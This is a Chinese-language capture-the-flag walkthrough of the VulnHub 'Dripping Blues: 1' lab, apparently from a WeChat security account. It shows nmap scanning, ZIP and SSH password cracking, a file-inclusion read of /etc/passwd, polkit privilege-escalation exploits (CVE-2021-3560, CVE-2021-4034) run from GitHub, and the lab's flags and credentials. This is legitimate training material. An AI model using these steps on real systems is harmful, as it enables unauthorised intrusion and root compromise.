下载地址:https://www.vulnhub.com/entry/dripping-blues-1,744/选择镜像文件进行下载。下载后解压是一个ovf文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。
文件名:drippingblues.ova文件大小:2.8 GBMD5:0C024E6396FE1F9D85E980B4630A6ACDSHA1:AC6824EF1A51FBF4D25C68681DEE3EBA827E5B99
无
获取root权限,共有两个flag。
thugger用户-user.txt:5C50FC503A2ABE93B4C5EE3425496521root用户-root.txt:78CE377EF7F10FF0EDCA63DD60EE63B8
确定IP地址、端口扫描、网站访问、目录扫描、FTP连接、ZIP文件爆破密码。
使用nmap确定该靶场IP地址,地址为:192.168.241.174。
namp -sP 192.168.241.0/24
使用nmap进行端口扫描,发现其开放21、22和80端口。
21端口开放FTP服务,vsftpd 3.0.3,且存在匿名访问,目录下有一个respectmydrip.zip;22端口开放SSH服务,OpenSSH 8.2p1;80端口开放HTTP服务,Apache httpd 2.4.41。
nmap -sV -v -T4 -A -p- 192.168.241.174
访问80端口,发现该网站被入侵过,入侵者署名是travisscott和thugger。
http://192.168.241.174
经过扫描,发现/index.php、/index.php/login、/robots.txt可以访问。
dirsearch -u http://192.168.241.174
其index.php页面和index.php/login页面内容相同,均为网站被入侵提示。
访问robots.txt页面,发现两个目录地址。
访问/dirpisreal.txt,给出SSH登录密码。
亲爱的黑客 wannabe订阅关于This Lyrism的评论:https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html数n字,然后把它们并排,然后md5sum即, hellohellohello >> md5sum hellohellohellohellolollo这是ssh的密码。
将内容下载到kali Linux。
cewl https://www.azlyrics.com/lyrics/youngthug/constantlyhating.htmlcat passwd.txt
另一个是:/etc/diripispowerful.html,猜测属于文件包含,但不知道字段参数。
ftp://192.168.241.174
下载该文件进行解压,发现需要输入密码。
开启临时HTTP服务,将文件导入传入kali Linux。
经过解压,发现需要输入密码,多次测试后密码均为失败。使用fcrackzip工具暴力破解一下。得到密码为072528035
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip 
解压ZIP文件、文件包含、爆破SSH账户、SSH连接、获得第一个flag、查看进程信息。
unzip respectmydrip.zip密码为07258035
查看respectmydirp.txt文件,发现一个提示“dirp”。
secr.zip文件解压还需要输入密码,且刚刚爆破的密码失败。
继续爆破secr.zip的解压密码。
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secret.zip在访问robots.txt页面,发现的目录地址:/etc/dripispowerful.html。
根据解压的文件respectmydrip.txt文件中有drip信息。
尝试使用该进行文件包含访问。
http://192.168.241.174/index.php?drip=/etc/dripispowerful.html
成功访问,在源码中发现了密码:imdrippinbiatch。
顺便再看看/etc/passwd,发现了用户thugger,且与靶场开机后,页面显示的用户名一致。
将以上内容保存到user.txt文件。
提取用户名信息保存到users.txt文件。
【cut -d: -f1 /etc/passwd > users.txt】
通使用hydra工具爆破SSH登录账户。
得到登录用户名称为:thugger。
(其实,在靶机开机后,登录页面已显示用户名称为thugger)
hydra -L users.txt -p imdrippinbiatch 192.168.241.174 ssh
已经获取到用户名thugger,密码imdirppinbiatch,SSH连接。
ssh thugger@192.168.241.174
user.txt:5C50FC503A2ABE93B4C5EE3425496521
发现poliktd进程。
polkit(原名 PolicyKit)是 Linux 系统中一个非常重要的权限控制组件,主要用于 非特权用户请求执行特权操作时的授权管理。它是现代 Linux 系统(如基于 systemd 的系统)中的一个关键安全机制。使用场景:图形化界面中执行系统设置(如网络配置、挂载磁盘)、控制 systemd 服务启动/停止、操作磁盘工具(如 udisks)、使用 cockpit、GNOME 控制中心 等需要提权操作的系统服务。CVE-2021-4034(PwnKit):影响几乎所有 Linux 发行版
ps -ef
下载exp文件、提权、获得第二个flag。
在github找到相关漏洞利用代码,下载到本机。
https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py开启临时http服务,在靶机中下载此文件。
执行该文件,即可获得root权限。
python3 CVE-2021-3560.py
以获取root权限。
经过查阅,在root用户目录下,发现root.txt
root.txt:78CE377EF7F10FF0EDCA63DD60EE63B8
也可以使用此代码进行提权。
https://github.com/berdav/CVE-2021-4034本机下载该文件,开启临时http服务,传入靶机。
解压CVE-2021-4034.zip
unzip CVE-2021-4034.zip
失败了,因靶机汇总未有make和gcc无法执行,只能使用python执行。
在github搜索后,发现python代码的CVE-2021-4034。
https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py下载导入靶机。
在靶机中运行该代码,即可获得root权限。
python3 CVE-2021-4034.py
免责声明
本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!
以下为本公众号声明内容,请知悉并遵守:
1.关于信息的准确性
本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。
2.法律与合规性
使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。
3.版权声明
本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。
4.合法用途限制
本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。
5.风险告知
因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。
暗魂攻防实验室
官方客服
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Dripping Blues: 1靶场渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论